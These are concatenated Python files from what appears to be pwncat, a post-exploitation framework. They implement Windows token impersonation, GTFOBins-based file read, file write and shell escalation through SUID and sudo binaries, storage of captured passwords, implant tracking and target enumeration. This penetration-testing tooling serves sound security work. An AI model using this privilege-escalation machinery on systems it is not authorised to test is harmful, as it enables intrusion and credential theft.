        return f"[cyan]{self.name}[/cyan] => {'|'.join(attributes)}"


class UserToken(ExecuteAbility):
    def __init__(self, source: str, uid: str, token: int):
        super().__init__(source=source, source_uid=None, uid=uid)
        self.types.append("token")

        self.token = token

    def can_impersonate(self, session: "pwncat.manager.Session"):
        """Test if the current session can impersonate tokens"""

        for priv in session.run("enumerate", types=["token.privilege"]):
            if (
                priv.name == "SeImpersonatePrivilege"
                and LuidAttribute.SE_PRIVILEGE_ENABLED in priv.attributes
            ):
                return True

        return False

    def title(self, session: "pwncat.manager.Session"):

        user = session.find_user(uid=self.uid)
        if user is None:
            user_name = f"SID({repr(self.uid)})"
        else:
            user_name = user.name

        if self.can_impersonate(session):
            return f"[red]Impersonatable[/red] [blue]{user_name}[/blue] Token: {self.token}"
        return f"[blue]{user_name}[/blue] Token: {self.token}"

    def shell(
        self, session: "pwncat.manager.Session"
    ) -> Callable[["pwncat.manager.Session"], None]:
        """Execute a new shell as the specified user. In this case, just impersonate the user."""

        if not self.can_impersonate(session):
            raise ModuleFailed("impersonate privilege not enabled")

        try:
            session.platform.impersonate(self.token)
        except PlatformError as exc:
            raise ModuleFailed(f"failed to impersonate token: {exc}")

        return lambda session: session.platform.revert_to_self()


class WindowsUser(User):
    """Windows-specific user data. This augments the :class:`User` class.

    :param source: the generating module
    :type source: str
    :param name: the name of the user
    :type name: str
    :param uid: the user identifier
    :type uid: str
    :param account_expires: the date/time when the account expires
    :type account_expires: Optional[datetime]
    :param description: description for this account
    :type description: str
    :param enabled: whether this account is enabled
    :type enabled: bool
    :param full_name: the full name of the user
    :type full_name: str
    :param password_changeable_date: the date/time when the password is changeable
    :type password_changeable_date: Optional[datetime]
    :param password_expires: the date/time when the password expires
    :type password_expires: Optional[datetime]
    :param user_may_change_password: whether the user can change their own password
    :type user_may_change_password: bool
    :param password_required: whether the password is required for login
    :type password_required: bool
    :param password_last_set: when the password was last changed
    :type password_last_set: Optional[datetime]
    :param last_logon: the last time the user logged in
    :type last_logon: Optional[datetime]
    :param principal_source: honestly, I'm not sure
    :type principal_source: str
    :param password: the user's password if known
    :type password: Optional[str] = None
    :param hash: the user's password hash if known
    :type hash: Optional[str] = None
    """

    def __init__(
        self,
        source: str,
        name: str,
        uid: str,
        account_expires: Optional[datetime],
        description: str,
        enabled: bool,
        full_name: str,
        password_changeable_date: Optional[datetime],
        password_expires: Optional[datetime],
        user_may_change_password: bool,
        password_required: bool,
        password_last_set: Optional[datetime],
        last_logon: Optional[datetime],
        principal_source: str,
        password: Optional[str] = None,
        hash: Optional[str] = None,
        well_known: bool = False,
    ):
        super().__init__(
            source=source, name=name, uid=uid, password=password, hash=hash
        )

        self.account_expires: Optional[datetime] = account_expires
        self.user_description: str = description
        self.enabled: bool = enabled
        self.full_name: str = full_name
        self.password_changeable_date: Optional[datetime] = password_changeable_date
        self.password_expires: Optional[datetime] = password_expires
        self.user_may_change_password: bool = user_may_change_password
        self.password_required: bool = password_required
        self.password_last_set: Optional[datetime] = password_last_set
        self.last_logon: Optional[datetime] = last_logon
        self.principal_source: str = principal_source
        self.hidden: bool = well_known

    def __repr__(self):
        if self.password is None and self.hash is None:
            return f"""User(uid={self.id}, name={repr(self.name)})"""
        elif self.password is not None:
            return f"""User(uid={repr(self.id)}, name={repr(self.name)}, password={repr(self.password)})"""
        else:
            return f"""User(uid={repr(self.id)}, name={repr(self.name)}, hash={repr(self.hash)})"""


class WindowsGroup(Group):
    """Windows-specific group. This augments the :class:`Group` class.

    :param source: the generating module
    :type source: str
    :param name: the group name
    :type name: str
    :param gid: the group SID
    :type gid: str
    :param description: description for this group
    :type description: str
    :param principal_source: honestly, again, I have no clue
    :type principal_source: str
    :param members: list of SIDs for group members
    :type members: List[str]
    """

    def __init__(
        self,
        source: str,
        name: str,
        gid: str,
        description: str,
        principal_source: str,
        members: List[str],
        domain: Optional[str] = None,
    ):
        super().__init__(source=source, name=name, gid=gid, members=members)

        self.group_description: str = description
        self.principal_source: str = principal_source
        self.domain: Optional[str] = domain



#!/usr/bin/env python3

from pwncat.util import console
from pwncat.commands import Complete, Parameter, CommandDefinition


class Command(CommandDefinition):
    """
    Set variable runtime variable parameters for pwncat
    """

    def get_config_variables(self):
        options = ["state"] + list(self.manager.config.values)

        if self.manager.target is not None:
            options.extend(user.name for user in self.manager.target.iter_users())

        if self.manager.config.module:
            options.extend(self.manager.config.module.ARGUMENTS.keys())

        return options

    PROG = "set"
    ARGS = {
        "--password,-p": Parameter(
            Complete.NONE,
            action="store_true",
            help="set a user password",
        ),
        "--global,-g": Parameter(
            Complete.NONE,
            action="store_true",
            help="Set a global configuration",
            default=False,
        ),
        "variable": Parameter(
            Complete.CHOICES,
            nargs="?",
            choices=get_config_variables,
            metavar="VARIABLE",
            help="the variable name to modify",
        ),
        "value": Parameter(
            Complete.LOCAL_FILE, nargs="?", help="the value for the given variable"
        ),
    }
    LOCAL = True

    def run(self, manager, args):
        if args.password and manager.target is None:
            manager.log(
                "[red]error[/red]: active target is required for user interaction"
            )
            return
        elif args.password:
            if args.variable is None:
                found = False
                for user in manager.target.run("enumerate", types=["user"]):
                    if user.password is not None:
                        console.print(
                            f" - [green]{user.name}[/green] -> [red]{repr(user.password)}[/red]"
                        )
                        found = True
                if not found:
                    console.log("[yellow]warning[/yellow]: no known user passwords")
            else:
                user = manager.target.find_user(name=args.variable)
                if user is None:
                    manager.target.log(
                        "[red]error[/red]: {args.variable}: user not found"
                    )
                    return
                console.print(
                    f" - [green]{args.variable}[/green] -> [red]{repr(args.value)}[/red]"
                )
                user.password = args.value
                manager.target.db.transaction_manager.commit()
        else:
            if args.variable is not None and args.value is not None:
                try:
                    if manager.sessions and args.variable == "db":
                        raise ValueError("cannot change database with running session")
                    manager.config.set(
                        args.variable, args.value, getattr(args, "global")
                    )
                    if args.variable == "db":
                        # Ensure the database is re-opened, if it was already
                        manager.open_database()
                    if manager.sessions and args.variable == "verbose":
                        # If the user changed the verbose option
                        # then apply it to every `session` to take effect
                        for session_id in manager.sessions:
                            session = manager.sessions[session_id]
                            session.platform.set_verbose(args.value == "True")
                except ValueError as exc:
                    console.log(f"[red]error[/red]: {exc}")
            elif args.variable is not None:
                value = manager.config[args.variable]
                console.print(
                    f" [cyan]{args.variable}[/cyan] = [yellow]{repr(value)}[/yellow]"
                )
            else:
                for name in manager.config:
                    value = manager.config[name]
                    console.print(
                        f" [cyan]{name}[/cyan] = [yellow]{repr(value)}[/yellow]"
                    )



#!/usr/bin/env python3

import pwncat
from pwncat.commands import Complete, Parameter, CommandDefinition


class Command(CommandDefinition):
    """
    Leave a layer of execution from this session. Layers are normally added
    as sub-shells from escalation modules.
    """

    PROG = "leave"
    ARGS = {
        "count": Parameter(
            Complete.NONE,
            type=int,
            default=1,
            nargs="?",
            help="number of layers to remove (default: 1)",
        ),
        "--all,-a": Parameter(
            Complete.NONE,
            action="store_true",
            help="leave all active layers",
        ),
    }

    def run(self, manager: "pwncat.manager.Manager", args):

        try:
            if args.all:
                args.count = len(manager.target.layers)

            for i in range(args.count):
                manager.target.layers.pop()(manager.target)

            manager.target.platform.refresh_uid()
        except IndexError:
            manager.target.log("[yellow]warning[/yellow]: no more layers to leave")



"""
A target is the data structure stored in the ZODB. It contains all enumerated
facts, installed implants, unique ID, last remote address identified and other
information needed across pwncat sessions to identify or interact with a target.
No information in this object is specific to a connection protocol or session.
"""
import enum
from typing import Tuple, Optional

import persistent
import persistent.list
from BTrees.OOBTree import OOBTree


class NAT(enum.Enum):
    """Indicates the current known state of NAT on the target host"""

    UNKNOWN = enum.auto()
    """ We currently don't have enough information to determine if NAT is used """
    ENABLED = enum.auto()
    """ NAT is definitely enabled. Public/private addresses differ. """
    DISABLED = enum.auto()
    """ NAT is definitely disabled. Public/private addresses are identical. """


class OS(enum.Enum):
    """Describes the operating system on the target host. This is normally
    set by the platform type when connecting, however may be interrogated
    from the target host directly. For example, in the case of similar OS's
    like Linux, Mac, and BSD, the platform may double check the OS prior to
    establishing a session.

    If the OS doesn't match your platform specifically, session establishment
    may fail, but any details collected so far will be stored (such as addresses
    and target OS information).
    """

    LINUX = enum.auto()
    """ A linux-based operating system """
    WINDOWS = enum.auto()
    """ Windows NT based operating system """
    MAC = enum.auto()
    """ Apple Mac OS """
    BSD = enum.auto()
    """ A BSD variant """
    UNKNOWN = enum.auto()
    """ Unknown Operatin System """


class Target(persistent.Persistent):
    """Describes collected data on a target host. This replaces the database
    in previous versions of pwncat. It collects enumeration facts, system info,
    persistence state, and any other contextual information stored across
    instances of pwncat. Properties added to this class are automatically stored
    in the ZODB database as described by your configuration.

    A target is initialized with no information, and has no requirement for what
    data is available. Depending on the state of the active connection (if any)
    and the type of system, some information may not be available. During
    construction of a new session, some information is automatically queried such
    as the public address (routable IP address from attacking perspective) and port
    number, internal address (IP address from perspective of target) and port,
    NAT state, hostname, and a platform specific unique identifier.
    """

    def __init__(self):

        self.name: Optional[str] = None
        """ An optional friendly name that can be used to refer to this target """
        self.public_address: Optional[Tuple[str, int]] = None
        """ Public address as routable by the attacker """
        self.platform: str = None
        """ Name of the platform used to interact with this target """
        self.internal_address: Optional[Tuple[str, int]] = None
        """ Internal address as viewed by the target """
        self.hostname: Optional[str] = None
        """ Hostname from the targets perspective """
        self.guid: Optional[str] = None
        """ Globally unique identifier normally determined by a platform
        specific algorithm. """
        self.os: OS = OS.UNKNOWN
        """ Target host operating system """
        self.facts: persistent.list.PersistentList = persistent.list.PersistentList()
        """ List of enumerated facts about the target host """
        self.enumerate_state: OOBTree = OOBTree()
        """ The state of all enumeration modules which drives the module schedule """
        self.tampers: persistent.list.PersistentList = persistent.list.PersistentList()
        """ List of files/properties of the target that have been modified and/or created. """
        self.users: persistent.list.PersistentList = persistent.list.PersistentList()
        """ List of users known on the target system (may not be all-encompassing depending on access) """
        self.utilities: OOBTree() = OOBTree()
        """ Mapping of utility names to paths. This is mainly used on Unix platforms to identify binaries available in the path. """
        self.implants: persistent.list.PersistentList = persistent.list.PersistentList()
        """ List of installed implants on this target host """

    @property
    def nat(self) -> NAT:
        """Determine if NAT is applied for this host. This simply tests
        whether the target views it's IP in the same way we do. This simply
        compares the public and internal addresses to infer the state of NAT
        on the target network.
        """

        if self.public_address is None or self.internal_address is None:
            return NAT.UNKNOWN

        return (
            NAT.DISABLED
            if self.public_address[0] == self.internal_address[0]
            else NAT.ENABLED
        )

    def facts_with(self, **kwargs):
        """Return a generator yielding facts which match the given properties. This is
        a relatively restrictive search and the properties must match exactly. For a more
        general search of facts, you can use a Python generator expression over the ``facts``
        list instead."""

        return (
            fact
            for fact in self.facts
            if all(getattr(fact, k, None) == v for k, v in kwargs.items())
        )



#!/usr/bin/env python3


import rich.markup

from pwncat.db import Fact
from pwncat.modules import ModuleFailed
from pwncat.platform.windows import Windows, PowershellError
from pwncat.modules.enumerate import EnumerateModule


class EnvironmentData(Fact):
    def __init__(self, source, variable: str, value: str):
        super().__init__(source=source, types=["system.environment"])

        self.variable: bool = variable
        self.value: str = value

    def title(self, session):
        return f"[cyan]{rich.markup.escape(self.variable)}[/cyan] = [blue]{rich.markup.escape(self.value)} [/blue]"


class Module(EnumerateModule):
    """Enumerate the current Windows Defender settings on the target"""

    PROVIDES = ["system.environment"]
    PLATFORM = [Windows]

    def enumerate(self, session):

        try:
            result = session.platform.powershell(
                "Get-ChildItem env:\\ | Select Name,Value"
            )

            if not result:
                raise ModuleFailed("failed to retrieve env: PSDrive")

            environment = result[0]

        except PowershellError as exc:
            raise ModuleFailed("failed to retrieve env: PSDrive") from exc

        for pair in environment:
            yield EnvironmentData(self.name, pair["Name"], pair["Value"])



"""
Classes implementing specific abilities. Abilities provide access to specific
actions as a different user. They are used when escalating privileges. Basic
ability types are defined such as file read, file write and shell execution.
This module also defines classes and methods which make building abilities
from GTFOBins methods simpler, since they are used in multiple places within
pwncat.
"""
import functools
import subprocess
from io import TextIOWrapper
from typing import IO, Union, Callable, Optional

import pwncat.subprocess
from pwncat.db import Fact
from pwncat.gtfobins import Capability
from pwncat.platform.linux import LinuxReader, LinuxWriter


def build_gtfo_ability(
    source: str,
    uid: Union[int, str],
    method: "pwncat.gtfobins.MethodWrapper",
    source_uid: Optional[Union[int, str]] = None,
    **kwargs,
) -> Union["GTFOFileRead", "GTFOFileWrite", "GTFOExecute"]:
    r"""Build a escalation ability from a GTFOBins method. This will return
    one of of the GTFO ability classes based on the capabilities exposed by
    the given GTFOBins method.

    :param source: the generating module
    :type source: str
    :param uid: the user ID of the target user
    :type uid: Union[int, str]
    :param method: the GTFObins method to use
    :type method: pwncat.gtfobins.MethodWrapper
    :param source_uid: the user ID of the required starting user (or None if it does not matter)
    :type source_uid: Optional[Union[int, str]]
    :param \*\*kwargs: keyword arguments passed to the GTFOBins method builder
    :rtype: Union[GTFOFileRead, GTFOFileWrite, GTFOExecute]
    """

    if method.cap == Capability.READ:
        return GTFOFileRead(
            source=source, source_uid=source_uid, uid=uid, method=method, **kwargs
        )
    if method.cap == Capability.WRITE:
        return GTFOFileWrite(
            source=source,
            uid=uid,
            method=method,
            length=100000000000,  # TODO: WE SHOULD FIX THIS???
            source_uid=source_uid,
            **kwargs,
        )
    if method.cap == Capability.SHELL:
        return GTFOExecute(
            source=source, source_uid=source_uid, uid=uid, method=method, **kwargs
        )


class FileReadAbility(Fact):
    """Represents the ability to read a file as a different user

    :param source: generating module name
    :type source: str
    :param source_uid: the starting UID or None if it doesn't matter
    :type source_uid: Optional[Union[int, str]]
    :param uid: the target UID
    :type uid: Union[int, str]
    """

    def __init__(
        self, source: str, source_uid: Optional[Union[int, str]], uid: Union[int, str]
    ):
        super().__init__(types=["ability.file.read"], source=source)

        self.uid = uid
        self.source_uid = source_uid

    def open(
        self,
        session,
        path: str,
        mode: str = "r",
        buffering: int = -1,
        encoding: str = "utf-8",
        errors: str = None,
        newline: str = None,
    ) -> IO:
        """Open a file for reading. This method mimics the builtin open
        function, and returns a file-like object for reading as the
        target user."""


class FileWriteAbility(Fact):
    """Represents the ability to write a file as a different user

    :param source: generating module name
    :type source: str
    :param source_uid: the starting UID or None if it doesn't matter
    :type source_uid: Optional[Union[int, str]]
    :param uid: the target UID
    :type uid: Union[int, str]
    """

    def __init__(
        self, source: str, source_uid: Optional[Union[int, str]], uid: Union[int, str]
    ):
        super().__init__(types=["ability.file.write"], source=source)

        self.uid = uid
        self.source_uid = source_uid

    def open(
        self,
        session,
        path: str,
        mode: str = "r",
        buffering: int = -1,
        encoding: str = "utf-8",
        errors: str = None,
        newline: str = None,
    ) -> IO:
        """Open a file for writing. This method mimics the builtin open
        function and returns a file-like object for writing as the
        target user."""


class ExecuteAbility(Fact):
    """Represents the ability to execute a shell as a different user.

    :param source: generating module name
    :type source: str
    :param source_uid: the starting UID or None if it doesn't matter
    :type source_uid: Optional[Union[int, str]]
    :param uid: the target UID
    :type uid: Union[int, str]
    """

    def __init__(
        self, source: str, source_uid: Optional[Union[int, str]], uid: Union[int, str]
    ):
        super().__init__(types=["ability.execute"], source=source)

        self.source_uid = source_uid
        self.uid = uid

    def shell(
        self, session: "pwncat.manager.Session"
    ) -> Callable[["pwncat.manager.Session"], None]:
        """Replace the current shell with a new shell as the identified user

        :param session: the session to operate on
        :type session: pwncat.manager.Session
        :returns: Callable - A lambda taking the session and exiting the new shell
        """


class SpawnAbility(Fact):
    """Represents the ability to spawn a non-interactive process as another user.

    :param source: generating module name
    :type source: str
    :param source_uid: the starting UID or None if it doesn't matter
    :type source_uid: Optional[Union[int, str]]
    :param uid: the target UID
    :type uid: Union[int, str]
    """

    def __init__(
        self, source: str, source_uid: Optional[Union[int, str]], uid: Union[int, str]
    ):
        super().__init__(types=["ability.spawn"], source=source)

        self.source_uid = source_uid
        self.uid = uid

    def execute(self, session: "pwncat.manager.Session", command: str):
        """Utilize this ability to execute a command as a different user

        :param session: the session on which to operate
        :type session: pwncat.manager.Session
        :param command: a command to execute
        :type command: str
        """


class GTFOFileRead(FileReadAbility):
    r"""Utilize a GTFO Method Wrapper to implement the FileReadAbility.

    :param source: generating module name
    :type source: str
    :param source_uid: the starting UID or None if it doesn't matter
    :type source_uid: Optional[Union[int, str]]
    :param uid: the target UID
    :type uid: Union[int, str]
    :param method: the gtfobins method to utilize
    :type method: pwncat.gtfobins.MethodWrapper
    :param \*\*kwargs: keyword arguments passed to the method builder
    """

    def __init__(
        self,
        source: str,
        source_uid: Optional[Union[int, str]],
        uid: Union[int, str],
        method: "pwncat.gtfobins.MethodWrapper",
        **kwargs,
    ):
        super().__init__(source=source, source_uid=source_uid, uid=uid)

        self.method = method
        self.kwargs = kwargs

    def open(
        self,
        session,
        path: str,
        mode: str = "r",
        buffering: int = -1,
        encoding: str = "utf-8",
        errors: str = None,
        newline: str = None,
    ):
        """Read the file data using a GTFObins reader"""

        if any(c not in "rb" for c in mode):
            raise ValueError("only r/b modes allowed")

        # Build the payload
        payload, input_data, exit_cmd = self.method.build(
            gtfo=session.platform.gtfo, lfile=path, **self.kwargs
        )

        # Send the command to the victim with the input and setup stdio pipes
        popen = session.platform.Popen(
            payload,
            shell=True,
            stdin=subprocess.PIPE,
            bufsize=buffering,
            bootstrap_input=input_data.encode("utf-8"),
        )

        # Wrap our file reader in a Linux specific file reader
        raw_reader = LinuxReader(
            popen,
            on_close=lambda filp: filp.popen.platform.channel.send(
                exit_cmd.encode("utf-8")
            ),
            name=path,
        )

        # Automatically decode to the specified encoding if requested
        if "b" not in mode:
            return TextIOWrapper(
                raw_reader,
                encoding=encoding,
                errors=errors,
                newline=newline,
                write_through=True,
                line_buffering=buffering == -1 or buffering == 1,
            )

        return raw_reader

    def title(self, session):
        user = session.find_user(uid=self.uid)
        source_user = session.find_user(uid=self.source_uid)

        if source_user is None:
            source_user = "[green]ANY[green]"
        else:
            source_user = f"[blue]{source_user.name}[/blue]"

        if "suid" in self.kwargs:
            description = " ([red]SUID[/red])"
        elif "spec" in self.kwargs:
            description = " ([red]SUDO[/red])"
        else:
            description = ""

        return f"file read as [blue]{user.name}[/blue] via [cyan]{self.method.binary_path}[/cyan]{description} from {source_user} ([magenta]{self.source}[/magenta])"


class GTFOFileWrite(FileWriteAbility):
    r"""Utilize a GTFO Method Wrapper to implement the FileWriteAbility

    :param source: generating module name
    :type source: str
    :param source_uid: the starting UID or None if it doesn't matter
    :type source_uid: Optional[Union[int, str]]
    :param uid: the target UID
    :type uid: Union[int, str]
    :param method: the gtfobins method to utilize
    :type method: pwncat.gtfobins.MethodWrapper
    :param \*\*kwargs: keyword arguments passed to the method builder
    """

    def __init__(
        self,
        source: str,
        source_uid: Optional[Union[int, str]],
        uid: Union[int, str],
        method: "pwncat.gtfobins.MethodWrapper",
        **kwargs,
    ):
        super().__init__(source=source, source_uid=source_uid, uid=uid)

        self.method = method
        self.kwargs = kwargs

    def open(
        self,
        session,
        path: str,
        mode: str = "w",
        buffering: int = -1,
        encoding: str = "utf-8",
        errors: str = None,
        newline: str = None,
    ):
        """Read the file data using a GTFObins reader"""

        if any(c not in "wb" for c in mode):
            raise ValueError("only w/b modes allowed")

        # Build the payload
        payload, input_data, exit_cmd = self.method.build(
            gtfo=session.platform.gtfo, lfile=path, **self.kwargs
        )

        # Send the command to the victim with the input and setup stdio pipes
        popen = session.platform.Popen(
            payload,
            shell=True,
            stdin=subprocess.PIPE,
            bufsize=buffering,
            bootstrap_input=input_data.encode("utf-8"),
        )

        # Wrap our file writer in a Linux specific file reader
        raw_writer = LinuxWriter(
            popen,
            on_close=lambda filp: filp.popen.platform.channel.send(
                exit_cmd.encode("utf-8")
            ),
            name=path,
        )

        # Automatically decode to the specified encoding if requested
        if "b" not in mode:
            return TextIOWrapper(
                raw_writer,
                encoding=encoding,
                errors=errors,
                newline=newline,
                write_through=True,
                line_buffering=buffering == -1 or buffering == 1,
            )

        return raw_writer

    def title(self, session):
        user = session.find_user(uid=self.uid)
        source_user = session.find_user(uid=self.source_uid)

        if source_user is None:
            source_user = "[green]ANY[green]"
        else:
            source_user = f"[blue]{source_user.name}[/blue]"

        if "suid" in self.kwargs:
            description = " ([red]SUID[/red])"
        elif "spec" in self.kwargs:
            description = " ([red]SUDO[/red])"
        else:
            description = ""

        return f"file write as [blue]{user.name}[/blue] via [cyan]{self.method.binary_path}[/cyan]{description} from {source_user} ([magenta]{self.source}[/magenta])"


class GTFOExecute(ExecuteAbility):
    r"""Execute a remote binary with a given GTFObins capability

    :param source: generating module name
    :type source: str
    :param source_uid: the starting UID or None if it doesn't matter
    :type source_uid: Optional[Union[int, str]]
    :param uid: the target UID
    :type uid: Union[int, str]
    :param method: the gtfobins method to utilize
    :type method: pwncat.gtfobins.MethodWrapper
    :param \*\*kwargs: keyword arguments passed to the method builder
    """

    def __init__(
        self,
        source: str,
        source_uid: Optional[Union[int, str]],
        uid: Union[int, str],
        method: "pwncat.gtfobins.MethodWrapper",
        **kwargs,
    ):
        super().__init__(source=source, source_uid=source_uid, uid=uid)

        self.method = method
        self.kwargs = kwargs

    def send_command(self, session, command: bytes = None):
        """Send the command to the target for this GTFObins"""

    def Popen(self, session, *args, **kwargs):
        """Emulate the platform.Popen method for execution as another user"""

        return session.platform.Popen(
            *args,
            **kwargs,
            send_command=functools.partial(self.send_command, session),
        )

    def run(self, session, *args, **kwargs):
        """Emulate the `platform.run` method for execution as another user"""

        return session.platform.run(
            *args, **kwargs, popen_class=functools.partial(self.Popen, session)
        )

    def shell(self, session):
        """Replace the running shell with a shell as another user"""

        # Figure out what shell to use based on the environment
        shell = session.platform.getenv("SHELL")
        if shell is None:
            shell = "/bin/sh"

        full_command = shell

        # Construct the GTFObins payload
        payload, input_data, exit_cmd = self.method.build(
            gtfo=session.platform.gtfo, shell=full_command, **self.kwargs
        )

        # Send the payload
        session.platform.channel.send(payload.encode("utf-8") + b"\n")

        # Send the input needed to trigger execution
        session.platform.channel.send(input_data)

        return lambda session: session.platform.channel.send(
            exit_cmd.encode("utf-8") + b"\n"
        )

    def title(self, session):
        user = session.find_user(uid=self.uid)
        source_user = session.find_user(uid=self.source_uid)

        if source_user is None:
            source_user = "[green]ANY[green]"
        else:
            source_user = f"[blue]{source_user.name}[/blue]"

        if "suid" in self.kwargs:
            description = " ([red]SUID[/red])"
        elif "spec" in self.kwargs:
            description = " ([red]SUDO[/red])"
        else:
            description = ""

        return f"shell as [blue]{user.name}[/blue] via [cyan]{self.method.binary_path}[/cyan]{description} from {source_user} ([magenta]{self.source}[/magenta])"



"""
Enumeration modules are the core information gathering mechanism within
pwncat. Enumeration modules are a subclass of :class:`pwncat.modules.BaseModule`.
However, they extend the functionality of a module to cache results
within the database and provide a structured way of specifying how often
to execute a given enumeration.

An enumeration module returns a list of facts. Each fact must inherit from
:class:`pwncat.db.Fact`. Each fact that is generated is stored in the
database, and deduplicated. A fact can have one or more types. A type is
simply a string which identifies the kind of data the fact represents.
When you define an enumeration module, you must specify a list of fact
types which your module is capable of generating. This is so that pwncat
can automatically locate facts of any type. Further, you must specify the
"schedule" for your enumeration. Schedules identify whether a module should
run only once, once per user or should run every time the given type is
requested. Unlike base modules, enumeration modules do not accept any
custom arguments. However, they do still require a list of compatible
platforms.

Aside from schedules, you can also specify an enumeration scope. The default
scope is ``Scope.HOST``. This scope saves facts to the database which is
shared between sessions and between instances of pwncat. ``Scope.SESSION``
defines facts which live only as long as the specific session is alive and
are not shared with other sessions with the same target. The ``Scope.NONE``
scope specifies that facts are never saved. This is normally used with
``Schedule.ALWAYS`` to have enumeration modules run every time without saving
the facts.

When defining an enumeration module, you must define the
:func:`EnumerateModule.enumerate` method. This method is a generator which
can yield either facts or status updates, just like the
:func:`pwncat.modules.BaseModule.run` method.

Example Enumerate Module
------------------------

.. code-block:: python
    :caption: Example Enumerate Module

    class CustomFact(Fact):
        \""" Custom fact data regarding the target \"""

        def __init__(self, source):
            super().__init__(source=source, types=["custom.fact.type"])

        def title(self, session: "pwncat.manager.Session"):
            return "[red]Custom Fact![/red]"

    class Module(EnumerateModule):
        \""" Module documentation \"""

        PLATFORM = [Windows]
        SCHEDULE = Schedule.PER_USER
        PROVIDES = ["custom.fact.type"]
        SCOPE = Scope.HOST

        def enumerate(self, session: "pwncat.manager.Session"):
            yield CustomFactObject(self.name)

"""
import typing
import fnmatch
from enum import Enum, auto

import pwncat
from pwncat.db import Fact
from pwncat.modules import List, Status, Argument, BaseModule
from pwncat.platform import Platform


class Schedule(Enum):
    """Defines how often an enumeration module will run"""

    ALWAYS = auto()
    """ Execute the enumeration every time the module is executed """
    PER_USER = auto()
    """ Execute the enumeration once per user on the target """
    ONCE = auto()
    """ Execute the enumeration once and only once """


class Scope(Enum):
    """Defines whether the fact is scoped to the target host or
    to the active session. Session-scoped facts are lost when a
    session ends."""

    HOST = auto()
    """ Host scope; facts are saved in the database """
    SESSION = auto()
    """ Session scope; facts are lost when the session ends """
    NONE = auto()
    """ No scope; facts are never saved this is most often used with Schedule.ALWAYS """


class EnumerateModule(BaseModule):
    """Base class for all enumeration modules.

    As discussed above, an enumeration module must define the :func:`enumerate`
    method, provide a list of supported platforms, a list of provided fact types
    and a schedule.

    The base enumeration module's :func:`run` method will provide a few routines
    and options. You can filter the results of this module with the ``types``
    argument. This causes the module to only return the types specified. You can
    also tell the module to clear any cached data from the database generated by
    this module. Lastly, if you specify ``cache=False``, the module will only
    return new facts that were not cached in the database already.
    """

    # List of categories/enumeration types this module provides
    # This should be set by the sub-classes to know where to find
    # different types of enumeration data
    PROVIDES: typing.List[str] = []
    """ List of fact types which this module is capable of providing """
    PLATFORM: typing.List[typing.Type[Platform]] = []
    """ List of supported platforms for this module """
    SCOPE: Scope = Scope.HOST
    """ Defines the scope for this fact (either host or session) """
    SCHEDULE: Schedule = Schedule.ONCE
    """ Determine the run schedule for this enumeration module """

    # Arguments which all enumeration modules should take
    # This shouldn't be modified. Enumeration modules don't take any
    # parameters
    ARGUMENTS = {
        "types": Argument(
            List(str),
            default=[],
            help="A list of enumeration types to retrieve (default: all)",
        ),
        "clear": Argument(
            bool,
            default=False,
            help="If specified, do not perform enumeration. Cleared cached results.",
        ),
        "cache": Argument(
            bool,
            default=True,
            help="return cached facts along with new facts (default: True)",
        ),
    }
    """ Arguments accepted by all enumeration modules. This **should not** be overridden. """

    def _get_cached(self, session: "pwncat.manager.Session"):
        """Retrieve the cached items for this module in the specified scope"""

        if self.SCOPE is Scope.HOST:
            return [fact for fact in session.target.facts if fact.source == self.name]

        if self.SCOPE is Scope.SESSION:
            return [fact for fact in session.facts if fact.source == self.name]

        return []

    def _clear_cache(self, session: "pwncat.manager.Session"):
        """Clear the cache based on the current scope"""

        if self.SCOPE is Scope.HOST:
            session.target.facts = [
                fact for fact in session.target.facts if fact.source != self.name
            ]

            if self.name in session.target.enumerate_state:
                del session.target.enumerate_state[self.name]

        if self.SCOPE is Scope.SESSION:
            session.facts = [fact for fact in session.facts if fact.source != self.name]

            if self.name in session.enumerate_state:
                del session.enumerate_state[self.name]

        return []

    def _mark_complete(self, session: "pwncat.manager.Session"):
        """Mark this enumeration as complete for the scope and current schedule context"""

        if self.SCOPE is Scope.HOST:
            state = session.target.enumerate_state
        elif self.SCOPE is Scope.SESSION or self.SCOPE is Scope.NONE:
            state = session.enumerate_state

        if self.SCHEDULE is Schedule.ONCE:
            state[self.name] = True
        elif self.SCHEDULE is Schedule.PER_USER:
            if self.name not in state:
                state[self.name] = [session.platform.getuid()]
            elif session.platform.getuid() not in state[self.name]:
                state[self.name].append(session.platform.getuid())

    def _check_complete(self, session: "pwncat.manager.Session"):
        """Check if this enumeration has already run for this scope and schedule context"""

        if self.SCHEDULE is Schedule.ALWAYS:
            return False

        if self.SCOPE is Scope.HOST:
            state = session.target.enumerate_state
        elif self.SCOPE is Scope.SESSION or self.SCOPE is Scope.NONE:
            state = session.enumerate_state

        if self.name not in state:
            return False
        elif self.SCHEDULE is Schedule.ONCE:
            return True
        elif self.SCHEDULE is Schedule.PER_USER:
            return session.platform.getuid() in state[self.name]

        return False

    def run(
        self,
        session: "pwncat.manager.Session",
        types: typing.List[str],
        clear: bool,
        cache: bool,
    ):
        """Locate all facts this module provides.

        Sub-classes should not override this method. Instead, use the
        enumerate method. `run` will cross-reference with database and
        ensure enumeration modules aren't re-run.

        :param session: the session on which to run the module
        :type session: pwncat.manager.Session
        :param types: list of requested fact types
        :type types: List[str]
        :param clear: whether to clear all cached enumeration data
        :type clear: bool
        :param cache: whether to return facts from the database or only new facts
        :type cache: bool
        """

        if clear:
            self._clear_cache(session)
            return

        # Yield all the know facts which have already been enumerated
        if cache and types:
            cached = [
                f
                for f in self._get_cached(session)
                if any(
                    any(fnmatch.fnmatch(item_type, req_type) for req_type in types)
                    for item_type in f.types
                )
            ]
        elif cache:
            cached = self._get_cached(session)
        else:
            cached = []

        yield from cached

        # Check if the module is scheduled to run now
        if self._check_complete(session):
            return

        for item in self.enumerate(session):

            # Allow non-fact status updates
            if isinstance(item, Status):
                yield item
                continue

            # Only add the item if it doesn't exist
            session.register_fact(item, self.SCOPE, commit=False)

            # Don't yield the actual fact if we didn't ask for this type
            if not types or any(
                any(fnmatch.fnmatch(item_type, req_type) for req_type in types)
                for item_type in item.types
            ):
                for c in cached:
                    if item == c:
                        break
                else:
                    yield item
            else:
                yield Status(item.title(session))

        self._mark_complete(session)

    def enumerate(
        self, session: "pwncat.manager.Session"
    ) -> typing.Generator[Fact, None, None]:
        """Enumerate facts according to the types listed in ``PROVIDES``.

        :param session: the session on which to enumerate
        :type session: pwncat.manager.Session
        """



#!/usr/bin/env python3

from pwncat.db import Fact
from pwncat.subprocess import CalledProcessError
from pwncat.platform.linux import Linux
from pwncat.modules.enumerate import EnumerateModule


class ContainerData(Fact):
    def __init__(self, source, system):
